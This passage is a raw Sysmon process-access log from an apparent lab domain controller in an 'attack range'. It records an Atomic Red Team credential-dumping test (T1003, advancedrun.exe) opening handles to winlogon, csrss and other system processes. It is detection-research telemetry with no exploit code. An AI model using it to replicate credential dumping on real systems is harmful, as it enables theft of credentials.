un\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003944007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003944006Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003944005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003944003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943997Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943996Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 